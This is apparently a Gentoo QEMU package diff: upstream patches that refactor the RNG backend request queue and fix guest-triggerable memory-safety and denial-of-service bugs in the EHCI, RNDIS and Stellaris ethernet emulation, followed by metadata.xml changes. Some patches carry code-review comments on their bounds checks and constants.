- RngEgd *s = RNG_EGD(b);
-
- /* We simply delete the list of pending requests. If there is data in the
- * queue waiting to be read, this is okay, because there will always be
- * more data than we requested originally
- */
- rng_egd_free_requests(s);
-}
-
static void rng_egd_opened(RngBackend *b, Error **errp)
{
RngEgd *s = RNG_EGD(b);
@@ -213,7 +202,6 @@ static void rng_egd_class_init(ObjectClass *klass, void *data)
RngBackendClass *rbc = RNG_BACKEND_CLASS(klass);
rbc->request_entropy = rng_egd_request_entropy;
- rbc->cancel_requests = rng_egd_cancel_requests;
rbc->opened = rng_egd_opened;
}
diff --git a/backends/rng.c b/backends/rng.c
index b7820ef..2f2f3ee 100644
--- a/backends/rng.c
+++ b/backends/rng.c
@@ -26,15 +26,6 @@ void rng_backend_request_entropy(RngBackend *s, size_t size,
}
}
-void rng_backend_cancel_requests(RngBackend *s)
-{
- RngBackendClass *k = RNG_BACKEND_GET_CLASS(s);
-
- if (k->cancel_requests) {
- k->cancel_requests(s);
- }
-}
-
static bool rng_backend_prop_get_opened(Object *obj, Error **errp)
{
RngBackend *s = RNG_BACKEND(obj);
diff --git a/include/sysemu/rng.h b/include/sysemu/rng.h
index 858be8c..87b3ebe 100644
--- a/include/sysemu/rng.h
+++ b/include/sysemu/rng.h
@@ -37,7 +37,6 @@ struct RngBackendClass
void (*request_entropy)(RngBackend *s, size_t size,
EntropyReceiveFunc *receive_entropy, void *opaque);
- void (*cancel_requests)(RngBackend *s);
void (*opened)(RngBackend *s, Error **errp);
};
@@ -68,14 +67,4 @@ struct RngBackend
void rng_backend_request_entropy(RngBackend *s, size_t size,
EntropyReceiveFunc *receive_entropy,
void *opaque);
-
-/**
- * rng_backend_cancel_requests:
- * @s: the backend to cancel all pending requests in
- *
- * Cancels all pending requests submitted by @rng_backend_request_entropy. This
- * should be used by a device during reset or in preparation for live migration
- * to stop tracking any request.
- */
-void rng_backend_cancel_requests(RngBackend *s);
#endif
--
2.7.4


@ -0,0 +1,135 @@
From 74074e8a7c60592cf1cc6469dbc2550d24aeded3 Mon Sep 17 00:00:00 2001
From: Ladi Prosek <lprosek@redhat.com>
Date: Thu, 3 Mar 2016 09:37:16 +0100
Subject: [PATCH] rng: move request queue from RngEgd to RngBackend
The 'requests' field now lives in the RngBackend parent class.
There are no functional changes in this commit.
Signed-off-by: Ladi Prosek <lprosek@redhat.com>
Reviewed-by: Amit Shah <amit.shah@redhat.com>
Message-Id: <1456994238-9585-3-git-send-email-lprosek@redhat.com>
Signed-off-by: Amit Shah <amit.shah@redhat.com>
---
backends/rng-egd.c | 28 +++++++++-------------------
include/sysemu/rng.h | 11 +++++++++++
2 files changed, 20 insertions(+), 19 deletions(-)
diff --git a/backends/rng-egd.c b/backends/rng-egd.c
index 0b2976a..b061362 100644
--- a/backends/rng-egd.c
+++ b/backends/rng-egd.c
@@ -25,19 +25,8 @@ typedef struct RngEgd
CharDriverState *chr;
char *chr_name;
-
- GSList *requests;
} RngEgd;
-typedef struct RngRequest
-{
- EntropyReceiveFunc *receive_entropy;
- uint8_t *data;
- void *opaque;
- size_t offset;
- size_t size;
-} RngRequest;
-
static void rng_egd_request_entropy(RngBackend *b, size_t size,
EntropyReceiveFunc *receive_entropy,
void *opaque)
@@ -66,7 +55,7 @@ static void rng_egd_request_entropy(RngBackend *b, size_t size,
size -= len;
}
- s->requests = g_slist_append(s->requests, req);
+ s->parent.requests = g_slist_append(s->parent.requests, req);
}
static void rng_egd_free_request(RngRequest *req)
@@ -81,7 +70,7 @@ static int rng_egd_chr_can_read(void *opaque)
GSList *i;
int size = 0;
- for (i = s->requests; i; i = i->next) {
+ for (i = s->parent.requests; i; i = i->next) {
RngRequest *req = i->data;
size += req->size - req->offset;
}
@@ -94,8 +83,8 @@ static void rng_egd_chr_read(void *opaque, const uint8_t *buf, int size)
RngEgd *s = RNG_EGD(opaque);
size_t buf_offset = 0;
- while (size > 0 && s->requests) {
- RngRequest *req = s->requests->data;
+ while (size > 0 && s->parent.requests) {
+ RngRequest *req = s->parent.requests->data;
int len = MIN(size, req->size - req->offset);
memcpy(req->data + req->offset, buf + buf_offset, len);
@@ -104,7 +93,8 @@ static void rng_egd_chr_read(void *opaque, const uint8_t *buf, int size)
size -= len;
if (req->offset == req->size) {
- s->requests = g_slist_remove_link(s->requests, s->requests);
+ s->parent.requests = g_slist_remove_link(s->parent.requests,
+ s->parent.requests);
req->receive_entropy(req->opaque, req->data, req->size);
@@ -117,12 +107,12 @@ static void rng_egd_free_requests(RngEgd *s)
{
GSList *i;
- for (i = s->requests; i; i = i->next) {
+ for (i = s->parent.requests; i; i = i->next) {
rng_egd_free_request(i->data);
}
- g_slist_free(s->requests);
- s->requests = NULL;
+ g_slist_free(s->parent.requests);
+ s->parent.requests = NULL;
}
static void rng_egd_opened(RngBackend *b, Error **errp)
diff --git a/include/sysemu/rng.h b/include/sysemu/rng.h
index 87b3ebe..c744d82 100644
--- a/include/sysemu/rng.h
+++ b/include/sysemu/rng.h
@@ -24,6 +24,7 @@
#define RNG_BACKEND_CLASS(klass) \
OBJECT_CLASS_CHECK(RngBackendClass, (klass), TYPE_RNG_BACKEND)
+typedef struct RngRequest RngRequest;
typedef struct RngBackendClass RngBackendClass;
typedef struct RngBackend RngBackend;
@@ -31,6 +32,15 @@ typedef void (EntropyReceiveFunc)(void *opaque,
const void *data,
size_t size);
+struct RngRequest
+{
+ EntropyReceiveFunc *receive_entropy;
+ uint8_t *data;
+ void *opaque;
+ size_t offset;
+ size_t size;
+};
+
struct RngBackendClass
{
ObjectClass parent_class;
@@ -47,6 +57,7 @@ struct RngBackend
/*< protected >*/
bool opened;
+ GSList *requests;
};
/**
--
2.7.4


@ -0,0 +1,155 @@
From 9f14b0add1dcdbfa2ee61051d068211fb0a1fcc9 Mon Sep 17 00:00:00 2001
From: Ladi Prosek <lprosek@redhat.com>
Date: Thu, 3 Mar 2016 09:37:17 +0100
Subject: [PATCH] rng: move request queue cleanup from RngEgd to RngBackend
RngBackend is now in charge of cleaning up the linked list on
instance finalization. It also exposes a function to finalize
individual RngRequest instances, called by its child classes.
Signed-off-by: Ladi Prosek <lprosek@redhat.com>
Reviewed-by: Amit Shah <amit.shah@redhat.com>
Message-Id: <1456994238-9585-4-git-send-email-lprosek@redhat.com>
Signed-off-by: Amit Shah <amit.shah@redhat.com>
---
backends/rng-egd.c | 25 +------------------------
backends/rng.c | 32 ++++++++++++++++++++++++++++++++
include/sysemu/rng.h | 12 ++++++++++++
3 files changed, 45 insertions(+), 24 deletions(-)
diff --git a/backends/rng-egd.c b/backends/rng-egd.c
index b061362..8f2bd16 100644
--- a/backends/rng-egd.c
+++ b/backends/rng-egd.c
@@ -58,12 +58,6 @@ static void rng_egd_request_entropy(RngBackend *b, size_t size,
s->parent.requests = g_slist_append(s->parent.requests, req);
}
-static void rng_egd_free_request(RngRequest *req)
-{
- g_free(req->data);
- g_free(req);
-}
-
static int rng_egd_chr_can_read(void *opaque)
{
RngEgd *s = RNG_EGD(opaque);
@@ -93,28 +87,13 @@ static void rng_egd_chr_read(void *opaque, const uint8_t *buf, int size)
size -= len;
if (req->offset == req->size) {
- s->parent.requests = g_slist_remove_link(s->parent.requests,
- s->parent.requests);
-
req->receive_entropy(req->opaque, req->data, req->size);
- rng_egd_free_request(req);
+ rng_backend_finalize_request(&s->parent, req);
}
}
}
-static void rng_egd_free_requests(RngEgd *s)
-{
- GSList *i;
-
- for (i = s->parent.requests; i; i = i->next) {
- rng_egd_free_request(i->data);
- }
-
- g_slist_free(s->parent.requests);
- s->parent.requests = NULL;
-}
-
static void rng_egd_opened(RngBackend *b, Error **errp)
{
RngEgd *s = RNG_EGD(b);
@@ -183,8 +162,6 @@ static void rng_egd_finalize(Object *obj)
}
g_free(s->chr_name);
-
- rng_egd_free_requests(s);
}
static void rng_egd_class_init(ObjectClass *klass, void *data)
diff --git a/backends/rng.c b/backends/rng.c
index 2f2f3ee..014cb9d 100644
--- a/backends/rng.c
+++ b/backends/rng.c
@@ -64,6 +64,30 @@ static void rng_backend_prop_set_opened(Object *obj, bool value, Error **errp)
s->opened = true;
}
+static void rng_backend_free_request(RngRequest *req)
+{
+ g_free(req->data);
+ g_free(req);
+}
+
+static void rng_backend_free_requests(RngBackend *s)
+{
+ GSList *i;
+
+ for (i = s->requests; i; i = i->next) {
+ rng_backend_free_request(i->data);
+ }
+
+ g_slist_free(s->requests);
+ s->requests = NULL;
+}
+
+void rng_backend_finalize_request(RngBackend *s, RngRequest *req)
+{
+ s->requests = g_slist_remove(s->requests, req);
+ rng_backend_free_request(req);
+}
+
static void rng_backend_init(Object *obj)
{
object_property_add_bool(obj, "opened",
@@ -72,6 +96,13 @@ static void rng_backend_init(Object *obj)
NULL);
}
+static void rng_backend_finalize(Object *obj)
+{
+ RngBackend *s = RNG_BACKEND(obj);
+
+ rng_backend_free_requests(s);
+}
+
static void rng_backend_class_init(ObjectClass *oc, void *data)
{
UserCreatableClass *ucc = USER_CREATABLE_CLASS(oc);
@@ -84,6 +115,7 @@ static const TypeInfo rng_backend_info = {
.parent = TYPE_OBJECT,
.instance_size = sizeof(RngBackend),
.instance_init = rng_backend_init,
+ .instance_finalize = rng_backend_finalize,
.class_size = sizeof(RngBackendClass),
.class_init = rng_backend_class_init,
.abstract = true,
diff --git a/include/sysemu/rng.h b/include/sysemu/rng.h
index c744d82..08a2eda 100644
--- a/include/sysemu/rng.h
+++ b/include/sysemu/rng.h
@@ -78,4 +79,15 @@ struct RngBackend
void rng_backend_request_entropy(RngBackend *s, size_t size,
EntropyReceiveFunc *receive_entropy,
void *opaque);
+
+/**
+ * rng_backend_free_request:
+ * @s: the backend that created the request
+ * @req: the request to finalize
+ *
+ * Used by child rng backend classes to finalize requests once they've been
+ * processed. The request is removed from the list of active requests and
+ * deleted.
+ */
+void rng_backend_finalize_request(RngBackend *s, RngRequest *req);
#endif
--
2.7.4
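Review bot: The doc comment added to include/sysemu/rng.h is headed `rng_backend_free_request:` but sits on the declaration of `rng_backend_finalize_request`. `rng_backend_free_request` is the static helper in backends/rng.c, which only frees and does not unlink from the list. The heading should read ` * rng_backend_finalize_request:` so that generated documentation and searches land on the public function.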


@ -0,0 +1,179 @@
From 60253ed1e6ec6d8e5ef2efe7bf755f475dce9956 Mon Sep 17 00:00:00 2001
From: Ladi Prosek <lprosek@redhat.com>
Date: Thu, 3 Mar 2016 09:37:18 +0100
Subject: [PATCH] rng: add request queue support to rng-random
Requests are now created in the RngBackend parent class and the
code path is shared by both rng-egd and rng-random.
This commit fixes the rng-random implementation which processed
only one request at a time and simply discarded all but the most
recent one. In the guest this manifested as delayed completion
of reads from virtio-rng, i.e. a read was completed only after
another read was issued.
By switching rng-random to use the same request queue as rng-egd,
the unsafe stack-based allocation of the entropy buffer is
eliminated and replaced with g_malloc.
Signed-off-by: Ladi Prosek <lprosek@redhat.com>
Reviewed-by: Amit Shah <amit.shah@redhat.com>
Message-Id: <1456994238-9585-5-git-send-email-lprosek@redhat.com>
Signed-off-by: Amit Shah <amit.shah@redhat.com>
---
backends/rng-egd.c | 16 ++--------------
backends/rng-random.c | 43 +++++++++++++++++++------------------------
backends/rng.c | 13 ++++++++++++-
include/sysemu/rng.h | 3 +--
4 files changed, 34 insertions(+), 41 deletions(-)
diff --git a/backends/rng-egd.c b/backends/rng-egd.c
index 8f2bd16..30332ed 100644
--- a/backends/rng-egd.c
+++ b/backends/rng-egd.c
@@ -27,20 +27,10 @@ typedef struct RngEgd
char *chr_name;
} RngEgd;
-static void rng_egd_request_entropy(RngBackend *b, size_t size,
- EntropyReceiveFunc *receive_entropy,
- void *opaque)
+static void rng_egd_request_entropy(RngBackend *b, RngRequest *req)
{
RngEgd *s = RNG_EGD(b);
- RngRequest *req;
-
- req = g_malloc(sizeof(*req));
-
- req->offset = 0;
- req->size = size;
- req->receive_entropy = receive_entropy;
- req->opaque = opaque;
- req->data = g_malloc(req->size);
+ size_t size = req->size;
while (size > 0) {
uint8_t header[2];
@@ -54,8 +44,6 @@ static void rng_egd_request_entropy(RngBackend *b, size_t size,
size -= len;
}
-
- s->parent.requests = g_slist_append(s->parent.requests, req);
}
static int rng_egd_chr_can_read(void *opaque)
diff --git a/backends/rng-random.c b/backends/rng-random.c
index 8cdad6a..a6cb385 100644
--- a/backends/rng-random.c
+++ b/backends/rng-random.c
@@ -22,10 +22,6 @@ struct RndRandom
int fd;
char *filename;
-
- EntropyReceiveFunc *receive_func;
- void *opaque;
- size_t size;
};
/**
@@ -38,36 +34,35 @@ struct RndRandom
static void entropy_available(void *opaque)
{
RndRandom *s = RNG_RANDOM(opaque);
- uint8_t buffer[s->size];
- ssize_t len;
- len = read(s->fd, buffer, s->size);
- if (len < 0 && errno == EAGAIN) {
- return;
- }
- g_assert(len != -1);
+ while (s->parent.requests != NULL) {
+ RngRequest *req = s->parent.requests->data;
+ ssize_t len;
+
+ len = read(s->fd, req->data, req->size);
+ if (len < 0 && errno == EAGAIN) {
+ return;
+ }
+ g_assert(len != -1);
- s->receive_func(s->opaque, buffer, len);
- s->receive_func = NULL;
+ req->receive_entropy(req->opaque, req->data, len);
+ rng_backend_finalize_request(&s->parent, req);
+ }
+
+ /* We've drained all requests, the fd handler can be reset. */
qemu_set_fd_handler(s->fd, NULL, NULL, NULL);
}
-static void rng_random_request_entropy(RngBackend *b, size_t size,
- EntropyReceiveFunc *receive_entropy,
- void *opaque)
+static void rng_random_request_entropy(RngBackend *b, RngRequest *req)
{
RndRandom *s = RNG_RANDOM(b);
- if (s->receive_func) {
- s->receive_func(s->opaque, NULL, 0);
+ if (s->parent.requests == NULL) {
+ /* If there are no pending requests yet, we need to
+ * install our fd handler. */
+ qemu_set_fd_handler(s->fd, entropy_available, NULL, s);
}
-
- s->receive_func = receive_entropy;
- s->opaque = opaque;
- s->size = size;
-
- qemu_set_fd_handler(s->fd, entropy_available, NULL, s);
}
static void rng_random_opened(RngBackend *b, Error **errp)
diff --git a/backends/rng.c b/backends/rng.c
index 014cb9d..277a41b 100644
--- a/backends/rng.c
+++ b/backends/rng.c
@@ -20,9 +20,20 @@ void rng_backend_request_entropy(RngBackend *s, size_t size,
void *opaque)
{
RngBackendClass *k = RNG_BACKEND_GET_CLASS(s);
+ RngRequest *req;
if (k->request_entropy) {
- k->request_entropy(s, size, receive_entropy, opaque);
+ req = g_malloc(sizeof(*req));
+
+ req->offset = 0;
+ req->size = size;
+ req->receive_entropy = receive_entropy;
+ req->opaque = opaque;
+ req->data = g_malloc(req->size);
+
+ k->request_entropy(s, req);
+
+ s->requests = g_slist_append(s->requests, req);
}
}
diff --git a/include/sysemu/rng.h b/include/sysemu/rng.h
index 08a2eda..4fffd68 100644
--- a/include/sysemu/rng.h
+++ b/include/sysemu/rng.h
@@ -45,8 +45,7 @@ struct RngBackendClass
{
ObjectClass parent_class;
- void (*request_entropy)(RngBackend *s, size_t size,
- EntropyReceiveFunc *receive_entropy, void *opaque);
+ void (*request_entropy)(RngBackend *s, RngRequest *req);
void (*opened)(RngBackend *s, Error **errp);
};
--
2.7.4


@ -0,0 +1,15 @@
Linux C libs are moving away from implicit header pollution with sys/types.h
--- a/include/qemu/osdep.h
+++ b/include/qemu/osdep.h
@@ -78,6 +78,10 @@ extern int daemon(int, int);
#include <assert.h>
#include <signal.h>
+#ifdef __linux__
+#include <sys/sysmacros.h>
+#endif
+
#ifdef __OpenBSD__
#include <sys/signal.h>
#endif


@ -0,0 +1,52 @@
From 49d925ce50383a286278143c05511d30ec41a36e Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Wed, 20 Jan 2016 01:26:46 +0530
Subject: [PATCH] usb: check page select value while processing iTD
While processing isochronous transfer descriptors(iTD), the page
select(PG) field value could lead to an OOB read access. Add
check to avoid it.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-id: 1453233406-12165-1-git-send-email-ppandit@redhat.com
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/hcd-ehci.c | 10 ++++++----
1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
index ab00268..93601d9 100644
--- a/hw/usb/hcd-ehci.c
+++ b/hw/usb/hcd-ehci.c
@@ -1405,21 +1405,23 @@ static int ehci_process_itd(EHCIState *ehci,
if (itd->transact[i] & ITD_XACT_ACTIVE) {
pg = get_field(itd->transact[i], ITD_XACT_PGSEL);
off = itd->transact[i] & ITD_XACT_OFFSET_MASK;
- ptr1 = (itd->bufptr[pg] & ITD_BUFPTR_MASK);
- ptr2 = (itd->bufptr[pg+1] & ITD_BUFPTR_MASK);
len = get_field(itd->transact[i], ITD_XACT_LENGTH);
if (len > max * mult) {
len = max * mult;
}
-
- if (len > BUFF_SIZE) {
+ if (len > BUFF_SIZE || pg > 6) {
return -1;
}
+ ptr1 = (itd->bufptr[pg] & ITD_BUFPTR_MASK);
qemu_sglist_init(&ehci->isgl, ehci->device, 2, ehci->as);
if (off + len > 4096) {
/* transfer crosses page border */
+ if (pg == 6) {
+ return -1; /* avoid page pg + 1 */
+ }
+ ptr2 = (itd->bufptr[pg + 1] & ITD_BUFPTR_MASK);
uint32_t len2 = off + len - 4096;
uint32_t len1 = len - len2;
qemu_sglist_add(&ehci->isgl, ptr1 + off, len1);
--
2.7.4
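Review bot: The added `if (pg == 6) { return -1; }` branch in ehci_process_itd comes after `qemu_sglist_init(&ehci->isgl, ehci->device, 2, ehci->as);`, so this early return leaves the scatter-gather list initialised with no matching destroy visible on that path. Either hoist the page-boundary check above the init, or release the list before leaving: `qemu_sglist_destroy(&ehci->isgl); return -1;`. The literal `6` in both checks would also be easier to audit if it were tied to the array, e.g. `pg >= ARRAY_SIZE(itd->bufptr)` for the first one, assuming bufptr is a fixed-size array (its declaration is outside the hunk). The function starts and ends outside the hunk, so confirm that no later cleanup already covers this return.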


@ -0,0 +1,59 @@
From fe3c546c5ff2a6210f9a4d8561cc64051ca8603e Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Wed, 17 Feb 2016 00:23:41 +0530
Subject: [PATCH] usb: check RNDIS buffer offsets & length
When processing remote NDIS control message packets,
the USB Net device emulator uses a fixed length(4096) data buffer.
The incoming informationBufferOffset & Length combination could
overflow and cross that range. Check control message buffer
offsets and length to avoid it.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-id: 1455648821-17340-3-git-send-email-ppandit@redhat.com
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/dev-network.c | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
diff --git a/hw/usb/dev-network.c b/hw/usb/dev-network.c
index 5dc4538..c6abd38 100644
--- a/hw/usb/dev-network.c
+++ b/hw/usb/dev-network.c
@@ -916,8 +916,9 @@ static int rndis_query_response(USBNetState *s,
bufoffs = le32_to_cpu(buf->InformationBufferOffset) + 8;
buflen = le32_to_cpu(buf->InformationBufferLength);
- if (bufoffs + buflen > length)
+ if (buflen > length || bufoffs >= length || bufoffs + buflen > length) {
return USB_RET_STALL;
+ }
infobuflen = ndis_query(s, le32_to_cpu(buf->OID),
bufoffs + (uint8_t *) buf, buflen, infobuf,
@@ -962,8 +963,9 @@ static int rndis_set_response(USBNetState *s,
bufoffs = le32_to_cpu(buf->InformationBufferOffset) + 8;
buflen = le32_to_cpu(buf->InformationBufferLength);
- if (bufoffs + buflen > length)
+ if (buflen > length || bufoffs >= length || bufoffs + buflen > length) {
return USB_RET_STALL;
+ }
ret = ndis_set(s, le32_to_cpu(buf->OID),
bufoffs + (uint8_t *) buf, buflen);
@@ -1213,8 +1215,9 @@ static void usb_net_handle_dataout(USBNetState *s, USBPacket *p)
if (le32_to_cpu(msg->MessageType) == RNDIS_PACKET_MSG) {
uint32_t offs = 8 + le32_to_cpu(msg->DataOffset);
uint32_t size = le32_to_cpu(msg->DataLength);
- if (offs + size <= len)
+ if (offs < len && size < len && offs + size <= len) {
qemu_send_packet(qemu_get_queue(s->nic), s->out_buf + offs, size);
+ }
}
s->out_ptr -= len;
memmove(s->out_buf, &s->out_buf[len], s->out_ptr);
--
2.7.4
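Review bot: The same offset/length validation is now written three times with different boundaries: `buflen > length || bufoffs >= length || bufoffs + buflen > length` in rndis_query_response and rndis_set_response, but `offs < len && size < len && offs + size <= len` in usb_net_handle_dataout. A single static helper in subtraction form, e.g. `return off <= total && n <= total - off;`, would make the no-wraparound property explicit and keep the three call sites from drifting apart. The `8 +` applied to the guest-supplied DataOffset happens before any check and wraps for values near the top of the `uint32_t` range; the same likely holds for bufoffs, whose declaration is outside the hunks, so validating the raw field before adding the header size would be the stricter order. The dataout path also drops a rejected packet silently, where a trace point would help when diagnosing a misbehaving guest. All three function bodies continue outside the hunks.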


@ -0,0 +1,107 @@
https://bugs.gentoo.org/580426
https://bugs.gentoo.org/568246
From a49923d2837d20510d645d3758f1ad87c32d0730 Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann <kraxel@redhat.com>
Date: Mon, 18 Apr 2016 09:20:54 +0200
Subject: [PATCH] Revert "ehci: make idt processing more robust"
This reverts commit 156a2e4dbffa85997636a7a39ef12da6f1b40254.
Breaks FreeBSD.
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/hcd-ehci.c | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
index d5c0e1c..43a8f7a 100644
--- a/hw/usb/hcd-ehci.c
+++ b/hw/usb/hcd-ehci.c
@@ -1397,7 +1397,7 @@ static int ehci_process_itd(EHCIState *ehci,
{
USBDevice *dev;
USBEndpoint *ep;
- uint32_t i, len, pid, dir, devaddr, endp, xfers = 0;
+ uint32_t i, len, pid, dir, devaddr, endp;
uint32_t pg, off, ptr1, ptr2, max, mult;
ehci->periodic_sched_active = PERIODIC_ACTIVE;
@@ -1489,10 +1489,9 @@ static int ehci_process_itd(EHCIState *ehci,
ehci_raise_irq(ehci, USBSTS_INT);
}
itd->transact[i] &= ~ITD_XACT_ACTIVE;
- xfers++;
}
}
- return xfers ? 0 : -1;
+ return 0;
}
--
2.7.4
From 1ae3f2f178087711f9591350abad133525ba93f2 Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann <kraxel@redhat.com>
Date: Mon, 18 Apr 2016 09:11:38 +0200
Subject: [PATCH] ehci: apply limit to iTD/sidt descriptors
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Commit "156a2e4 ehci: make idt processing more robust" tries to avoid a
DoS by the guest (create a circular iTD queue and let qemu ehci
emulation run in circles forever). Unfortunately this has two problems:
First it misses the case of siTDs, and second it reportedly breaks
FreeBSD.
So lets go for a different approach: just count the number of iTDs and
siTDs we have seen per frame and apply a limit. That should really
catch all cases now.
Reported-by: 杜少博 <dushaobo@360.cn>
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/hcd-ehci.c | 6 +++++-
1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
index 159f58d..d5c0e1c 100644
--- a/hw/usb/hcd-ehci.c
+++ b/hw/usb/hcd-ehci.c
@@ -2011,6 +2011,7 @@ static int ehci_state_writeback(EHCIQueue *q)
static void ehci_advance_state(EHCIState *ehci, int async)
{
EHCIQueue *q = NULL;
+ int itd_count = 0;
int again;
do {
@@ -2035,10 +2036,12 @@ static void ehci_advance_state(EHCIState *ehci, int async)
case EST_FETCHITD:
again = ehci_state_fetchitd(ehci, async);
+ itd_count++;
break;
case EST_FETCHSITD:
again = ehci_state_fetchsitd(ehci, async);
+ itd_count++;
break;
case EST_ADVANCEQUEUE:
@@ -2087,7 +2090,8 @@ static void ehci_advance_state(EHCIState *ehci, int async)
break;
}
- if (again < 0) {
+ if (again < 0 || itd_count > 16) {
+ /* TODO: notify guest (raise HSE irq?) */
fprintf(stderr, "processing error - resetting ehci HC\n");
ehci_reset(ehci);
again = 0;
--
2.7.4
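Review bot: The ceiling in `if (again < 0 || itd_count > 16)` is a bare literal with no comment on why 16 descriptors is a safe upper bound for well-behaved guests; a named constant (for example `#define EHCI_MAX_ITD_PER_RUN 16`, name suggested here) with a one-line rationale would make the limit reviewable and tunable. The count-limit case also reuses the `processing error - resetting ehci HC` message of a genuine `again < 0` failure, so someone reading the log cannot tell a descriptor-loop cutoff from a processing error; a distinct message for the `itd_count` case would help triage. itd_count is a local of ehci_advance_state, so it restarts on every call rather than strictly per frame as the description puts it; confirm that this matches how the periodic schedule invokes the function. The function body extends outside the hunks.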


@ -0,0 +1,16 @@
https://lists.gnu.org/archive/html/qemu-devel/2016-04/msg01106.html
https://bugs.gentoo.org/580040
diff --git a/hw/i386/kvmvapic.c b/hw/i386/kvmvapic.c
index c69f374..ff1e31a 100644
--- a/hw/i386/kvmvapic.c
+++ b/hw/i386/kvmvapic.c
@@ -394,7 +394,7 @@ static void patch_instruction(VAPICROMState *s, X86CPU *cpu, target_ulong ip)
CPUX86State *env = &cpu->env;
VAPICHandlers *handlers;
uint8_t opcode[2];
- uint32_t imm32;
+ uint32_t imm32 = 0;
target_ulong current_pc = 0;
target_ulong current_cs_base = 0;
int current_flags = 0;


@ -0,0 +1,47 @@
From 3a15cc0e1ee7168db0782133d2607a6bfa422d66 Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Fri, 8 Apr 2016 11:33:48 +0530
Subject: [PATCH] net: stellaris_enet: check packet length against receive
buffer
When receiving packets over Stellaris ethernet controller, it
uses receive buffer of size 2048 bytes. In case the controller
accepts large(MTU) packets, it could lead to memory corruption.
Add check to avoid it.
Reported-by: Oleksandr Bazhaniuk <oleksandr.bazhaniuk@intel.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-id: 1460095428-22698-1-git-send-email-ppandit@redhat.com
Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
---
hw/net/stellaris_enet.c | 12 +++++++++++-
1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/hw/net/stellaris_enet.c b/hw/net/stellaris_enet.c
index 84cf60b..6880894 100644
--- a/hw/net/stellaris_enet.c
+++ b/hw/net/stellaris_enet.c
@@ -236,8 +236,18 @@ static ssize_t stellaris_enet_receive(NetClientState *nc, const uint8_t *buf, si
n = s->next_packet + s->np;
if (n >= 31)
n -= 31;
- s->np++;
+ if (size >= sizeof(s->rx[n].data) - 6) {
+ /* If the packet won't fit into the
+ * emulated 2K RAM, this is reported
+ * as a FIFO overrun error.
+ */
+ s->ris |= SE_INT_FOV;
+ stellaris_enet_update(s);
+ return -1;
+ }
+
+ s->np++;
s->rx[n].len = size + 6;
p = s->rx[n].data;
*(p++) = (size + 6);
--
2.7.4
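Review bot: The overhead `6` in `size >= sizeof(s->rx[n].data) - 6` is the same unnamed literal that reappears in `s->rx[n].len = size + 6;` and `*(p++) = (size + 6);`, so the bound and the writes it protects are only linked by convention. A named constant with a short comment saying what the six bytes are (presumably the length prefix plus trailing checksum, to be confirmed against the rest of the function) would keep them in step. The remainder of stellaris_enet_receive is outside the hunk; if later code writes alignment padding beyond `size + 6` bytes, confirm that the `>=` margin still covers it for the largest accepted packet.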


@ -1,7 +1,10 @@
<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd"> <!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata> <pkgmetadata>
<herd>qemu</herd> <maintainer type="project">
<email>qemu@gentoo.org</email>
<name>Gentoo QEMU Project</name>
</maintainer>
<use> <use>
<flag name="accessibility">Adds support for braille displays using brltty</flag> <flag name="accessibility">Adds support for braille displays using brltty</flag>
<flag name="aio">Enables support for Linux's Async IO</flag> <flag name="aio">Enables support for Linux's Async IO</flag>
@ -10,6 +13,9 @@
<flag name="fdt">Enables firmware device tree support</flag> <flag name="fdt">Enables firmware device tree support</flag>
<flag name="glusterfs">Enables GlusterFS cluster fileystem via <flag name="glusterfs">Enables GlusterFS cluster fileystem via
<pkg>sys-cluster/glusterfs</pkg></flag> <pkg>sys-cluster/glusterfs</pkg></flag>
<flag name="gnutls">Enable TLS support for the VNC console server.
For 1.4 and newer this also enables WebSocket support.
For 2.0 through 2.3 also enables disk quorum support.</flag>
<flag name="gtk2">Use gtk-2 instead of gtk-3</flag> <flag name="gtk2">Use gtk-2 instead of gtk-3</flag>
<flag name="iscsi">Enable direct iSCSI support via <flag name="iscsi">Enable direct iSCSI support via
<pkg>net-libs/libiscsi</pkg> instead of indirectly via the Linux <pkg>net-libs/libiscsi</pkg> instead of indirectly via the Linux
@ -32,9 +38,6 @@
<flag name="snappy">Enable support for snappy compression</flag> <flag name="snappy">Enable support for snappy compression</flag>
<flag name="systemtap">Enable SystemTAP/DTrace tracing</flag> <flag name="systemtap">Enable SystemTAP/DTrace tracing</flag>
<flag name="tci">Enable the TCG Interpreter which can speed up or slowdown workloads depending on the host and guest CPUs being emulated. In the future it will be a runtime option but for now its compile time.</flag> <flag name="tci">Enable the TCG Interpreter which can speed up or slowdown workloads depending on the host and guest CPUs being emulated. In the future it will be a runtime option but for now its compile time.</flag>
<flag name="tls">Enable TLS support for the VNC console server.
For 1.4 and newer this also enables WebSocket support.
For 2.0 through 2.3 also enables disk quorum support.</flag>
